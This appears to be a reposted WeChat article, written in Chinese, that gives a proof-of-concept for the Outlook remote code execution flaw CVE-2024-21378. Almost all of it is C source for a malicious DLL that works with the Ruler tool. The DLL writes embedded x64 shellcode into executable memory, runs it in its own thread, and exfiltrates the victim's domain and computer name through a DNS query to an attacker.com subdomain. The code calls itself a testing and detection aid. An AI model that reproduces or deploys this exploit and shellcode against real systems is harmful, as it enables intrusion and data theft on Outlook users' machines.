文章:CVE-2024-21378 — Microsoft Outlook 中的远程代码执行
概念验证:
https://gist.github.com/Homer28/7f3559ff993e2598d0ceefbaece1f97f
/*** This DLL is designed for use in conjunction with the Ruler tool for* security testing related to the CVE-2024-21378 vulnerability,* specifically targeting MS Outlook.** It can be used with the following command line syntax:* ruler [auth-params] form add-com [attack-params] --dll ./test.dll* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).** After being loaded into MS Outlook, it sends the PC's hostname and* domain name to a DNS resolver and then terminates its execution.** Unauthorized use of the DLL for malicious activities is strictly* prohibited and may violate applicable laws.** The DLL can also be utilized by antivirus software developers for the* purpose of developing and testing detection routines.* It serves as a practical example for enhancing security measures against* the CVE-2024-21378 vulnerability.** Authors: @Homer28* License: MIT**/#include <windns.h>#include <windows.h>#include <iostream>/*** We don't put an arbitrary code into DllMain because it will cause* MS Outlook to freeze. Instead, our main payload will be* a shellcode that we start in a separate thread.** To create the shellcode, we will use the "easy_shellcode_generator" tool.* URL: https://github.com/Homer28/easy_shellcode_generator** Step-by-step instructions:** 1. Install Visual Studio 2022.* 2. Insert your C code into the shell_generator.cpp file.* 3. Compile the project.* 4. Use the pe_converter.py script to extract the shellcode,* for example: py ./python/pe_converter.py "../bin/shell_generator.exe" "../bin/shellcode.h"** This command can also be executed on Linux. Python3 and the Python3 pefile package are required.** 5. Copy the content of shellcode.h below.** The below content is the result of compiling following C code.* int main(wchar_t *dns_str) {* HMODULE mod_kernel32 = getKernel32_by_str();** fnGetProcAddress myGetProcAddress = (fnGetProcAddress)getAPIAddr_byStr(mod_kernel32, "getprocaddress");* fnLoadLibraryA myLoadLibrary = (fnLoadLibraryA)myGetProcAddress(mod_kernel32, "LoadLibraryA");** HMODULE dnsLib = myLoadLibrary("DNSAPI.dll");* fnDnsQuery_W myDnsQuery_W = (fnDnsQuery_W)myGetProcAddress(dnsLib, "DnsQuery_W");** PDNS_RECORD dnsRecord;** myDnsQuery_W(* dns_str,* DNS_TYPE_A,* DNS_QUERY_STANDARD,* NULL,* &dnsRecord,* NULL* );** return 0;* }**/#if _WIN64#define ptr_uint uint64_tHANDLE g_threadH;uint32_t payload_zx = 997;uint32_t payload_EP_offset = 0x1A0;unsigned char rawData[] = {0xa0, 0x11, 0x00, 0x00, 0xcf, 0x13, 0x00, 0x00, 0xd0, 0x13, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32,0x2e, 0x64, 0x6c, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x67, 0x65, 0x74, 0x70,0x72, 0x6f, 0x63, 0x61, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x00,0x4c, 0x6f, 0x61, 0x64, 0x4c, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41,0x00, 0x00, 0x00, 0x00, 0x44, 0x4e, 0x53, 0x41, 0x50, 0x49, 0x2e, 0x64,0x6c, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x6e, 0x73, 0x51,0x75, 0x65, 0x72, 0x79, 0x5f, 0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0xef, 0x38, 0x0c, 0x66, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00,0x78, 0x00, 0x00, 0x00, 0xa4, 0x10, 0x00, 0x00, 0xa4, 0x02, 0x00, 0x00,0x18, 0x00, 0x00, 0x00, 0x02, 0x80, 0x02, 0x80, 0x90, 0x10, 0x00, 0x00,0x04, 0x00, 0x00, 0x00, 0x94, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,0xb5, 0x11, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x5c, 0x00, 0x00, 0x00,0x20, 0x11, 0x00, 0x00, 0xc8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x2e, 0x70, 0x64, 0x61,0x74, 0x61, 0x00, 0x00, 0x10, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00,0x2e, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x78, 0x10, 0x00, 0x00,0x2c, 0x00, 0x00, 0x00, 0x2e, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x76,0x6f, 0x6c, 0x74, 0x6d, 0x64, 0x00, 0x00, 0x00, 0xa4, 0x10, 0x00, 0x00,0x7c, 0x00, 0x00, 0x00, 0x2e, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7a,0x7a, 0x7a, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, 0x20, 0x11, 0x00, 0x00,0xb0, 0x02, 0x00, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6d, 0x6e,0x00, 0x00, 0x00, 0x00, 0xd0, 0x13, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00,0x2e, 0x78, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x44, 0x0f, 0xb6, 0x01, 0x45, 0x84, 0xc0, 0x74, 0x1f, 0x41, 0x0f, 0xb6,0xc0, 0x48, 0x2b, 0xca, 0x44, 0x0f, 0xb6, 0xc0, 0x3a, 0x02, 0x75, 0x10,0x0f, 0xb6, 0x44, 0x11, 0x01, 0x48, 0xff, 0xc2, 0x44, 0x0f, 0xb6, 0xc0,0x84, 0xc0, 0x75, 0xe8, 0x0f, 0xb6, 0x0a, 0x33, 0xd2, 0x8b, 0xc2, 0x44,0x3a, 0xc1, 0x0f, 0x97, 0xc0, 0x0f, 0x92, 0xc2, 0x2b, 0xc2, 0xc3, 0xcc,0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc,0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0x0f, 0xb6, 0x02, 0x84,0xc0, 0x74, 0x1a, 0x48, 0x2b, 0xd1, 0x66, 0x0f, 0x1f, 0x44, 0x00, 0x00,0x88, 0x01, 0x48, 0x8d, 0x49, 0x01, 0x0f, 0xb6, 0x04, 0x0a, 0x84, 0xc0,0x75, 0xf2, 0x88, 0x01, 0xc3, 0x88, 0x01, 0xc3, 0xcc, 0xcc, 0xcc, 0xcc,0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,0x08, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x56, 0x48, 0x81,0xec, 0x80, 0x01, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00,0x00, 0x00, 0x4c, 0x8b, 0xf1, 0x48, 0x8b, 0x50, 0x18, 0x4c, 0x8b, 0x52,0x18, 0x4d, 0x8b, 0xca, 0x0f, 0x1f, 0x40, 0x00, 0x4d, 0x8b, 0x09, 0x49,0x83, 0x79, 0x30, 0x00, 0x0f, 0x84, 0x94, 0x00, 0x00, 0x00, 0x45, 0x0f,0xb7, 0x41, 0x58, 0x33, 0xd2, 0x4d, 0x85, 0xc0, 0x74, 0x20, 0x66, 0x0f,0x1f, 0x44, 0x00, 0x00, 0x48, 0x83, 0xfa, 0x40, 0x73, 0x14, 0x49, 0x8b,0x41, 0x60, 0x0f, 0xb6, 0x0c, 0x50, 0x88, 0x4c, 0x14, 0x30, 0x48, 0xff,0xc2, 0x49, 0x3b, 0xd0, 0x72, 0xe6, 0x0f, 0xb6, 0x44, 0x24, 0x30, 0x84,0xc0, 0x74, 0x1c, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x8d, 0x48, 0xbf, 0x80,0xf9, 0x19, 0x77, 0x04, 0x04, 0x20, 0x88, 0x02, 0x0f, 0xb6, 0x42, 0x01,0x48, 0xff, 0xc2, 0x84, 0xc0, 0x75, 0xe9, 0x48, 0x8d, 0x0d, 0xda, 0xfd,0xff, 0xff, 0xb2, 0x6b, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0x49, 0x2b, 0xc8,0x48, 0x8d, 0x44, 0x24, 0x30, 0x44, 0x0f, 0xb6, 0x00, 0x41, 0x3a, 0xd0,0x75, 0x10, 0x0f, 0xb6, 0x54, 0x01, 0x01, 0x48, 0xff, 0xc0, 0x84, 0xd2,0x75, 0xeb, 0x44, 0x0f, 0xb6, 0x00, 0x33, 0xc9, 0x41, 0x3a, 0xd0, 0x0f,0x97, 0xc1, 0x33, 0xc0, 0x41, 0x3a, 0xd0, 0x0f, 0x92, 0xc0, 0x3b, 0xc8,0x74, 0x09, 0x4d, 0x3b, 0xd1, 0x0f, 0x85, 0x55, 0xff, 0xff, 0xff, 0x49,0x8b, 0x79, 0x30, 0x45, 0x33, 0xd2, 0x48, 0x63, 0x47, 0x3c, 0x8b, 0x8c,0x38, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x5c, 0x39, 0x1c, 0x44, 0x8b, 0x5c,0x39, 0x20, 0x8b, 0x6c, 0x39, 0x24, 0x4c, 0x03, 0xdf, 0x48, 0x03, 0xef,0x48, 0x8d, 0x34, 0x1f, 0x85, 0xdb, 0x0f, 0x84, 0xb2, 0x00, 0x00, 0x00,0x4c, 0x8d, 0x0d, 0x6d, 0xfd, 0xff, 0xff, 0x48, 0x8d, 0x44, 0x24, 0x70,0x4c, 0x2b, 0xc8, 0x0f, 0x1f, 0x44, 0x00, 0x00, 0x41, 0x8b, 0x13, 0x48,0x8d, 0x44, 0x24, 0x70, 0x48, 0x03, 0xd7, 0x0f, 0xb6, 0x0a, 0x84, 0xc9,0x74, 0x1b, 0x4c, 0x8d, 0x44, 0x24, 0x70, 0x49, 0x2b, 0xd0, 0x66, 0x0f,0x1f, 0x44, 0x00, 0x00, 0x88, 0x08, 0x48, 0xff, 0xc0, 0x0f, 0xb6, 0x0c,0x02, 0x84, 0xc9, 0x75, 0xf3, 0x88, 0x08, 0x0f, 0xb6, 0x4c, 0x24, 0x70,0x84, 0xc9, 0x74, 0x1f, 0x48, 0x8d, 0x54, 0x24, 0x70, 0x0f, 0x1f, 0x00,0x8d, 0x41, 0xbf, 0x3c, 0x19, 0x77, 0x05, 0x80, 0xc1, 0x20, 0x88, 0x0a,0x0f, 0xb6, 0x4a, 0x01, 0x48, 0xff, 0xc2, 0x84, 0xc9, 0x75, 0xe9, 0x48,0x8d, 0x44, 0x24, 0x70, 0xb2, 0x67, 0x66, 0x90, 0x44, 0x0f, 0xb6, 0x00,0x41, 0x3a, 0xd0, 0x75, 0x11, 0x41, 0x0f, 0xb6, 0x54, 0x01, 0x01, 0x48,0xff, 0xc0, 0x84, 0xd2, 0x75, 0xea, 0x44, 0x0f, 0xb6, 0x00, 0x33, 0xc9,0x41, 0x3a, 0xd0, 0x0f, 0x97, 0xc1, 0x33, 0xc0, 0x41, 0x3a, 0xd0, 0x0f,0x92, 0xc0, 0x3b, 0xc8, 0x74, 0x73, 0x41, 0xff, 0xc2, 0x49, 0x83, 0xc3,0x04, 0x44, 0x3b, 0xd3, 0x0f, 0x82, 0x62, 0xff, 0xff, 0xff, 0x33, 0xdb,0x48, 0x8d, 0x15, 0xc9, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0xcf, 0xff, 0xd3,0x48, 0x8d, 0x0d, 0xcd, 0xfc, 0xff, 0xff, 0xff, 0xd0, 0x48, 0x8d, 0x15,0xd4, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0xc8, 0xff, 0xd3, 0x48, 0x8d, 0x8c,0x24, 0xa8, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,0x00, 0x00, 0x48, 0x89, 0x4c, 0x24, 0x20, 0xba, 0x01, 0x00, 0x00, 0x00,0x49, 0x8b, 0xce, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0xff, 0xd0, 0x4c,0x8d, 0x9c, 0x24, 0x80, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x49, 0x8b, 0x5b,0x20, 0x49, 0x8b, 0x6b, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5e, 0x5f, 0x5e,0xc3, 0x42, 0x0f, 0xb7, 0x4c, 0x55, 0x00, 0x8b, 0x1c, 0x8e, 0x48, 0x03,0xdf, 0xeb, 0x91, 0xcc, 0x01, 0x15, 0x09, 0x00, 0x15, 0x54, 0x36, 0x00,0x15, 0x34, 0x34, 0x00, 0x15, 0x01, 0x30, 0x00, 0x0e, 0xe0, 0x0c, 0x70,0xb};#else#endifBOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call,LPVOID lpReserved) {switch (ul_reason_for_call) {case DLL_PROCESS_ATTACH: {std::wstring dns_resolve_address = L"new.d%USERDOMAIN%.u%COMPUTERNAME%.attacker.com";wchar_t dns_name[MAX_PATH];if (ExpandEnvironmentStringsW(dns_resolve_address.c_str(), dns_name,MAX_PATH)) {LPVOID payload_memory = VirtualAlloc(NULL, payload_zx, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (payload_memory) {memcpy_s(payload_memory, payload_zx, rawData, payload_zx);wchar_t* dns_name_allocated = (wchar_t*)VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);wcscpy_s(dns_name_allocated, MAX_PATH, dns_name);g_threadH = CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)((ptr_uint)payload_memory +(ptr_uint)payload_EP_offset),dns_name_allocated, 0, NULL);}}break;}case DLL_THREAD_ATTACH:break;case DLL_THREAD_DETACH:break;case DLL_PROCESS_DETACH:break;}return TRUE;}
原文始发于微信公众号(Ots安全):CVE-2024-21378:Microsoft Outlook 远程代码执行漏洞 POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论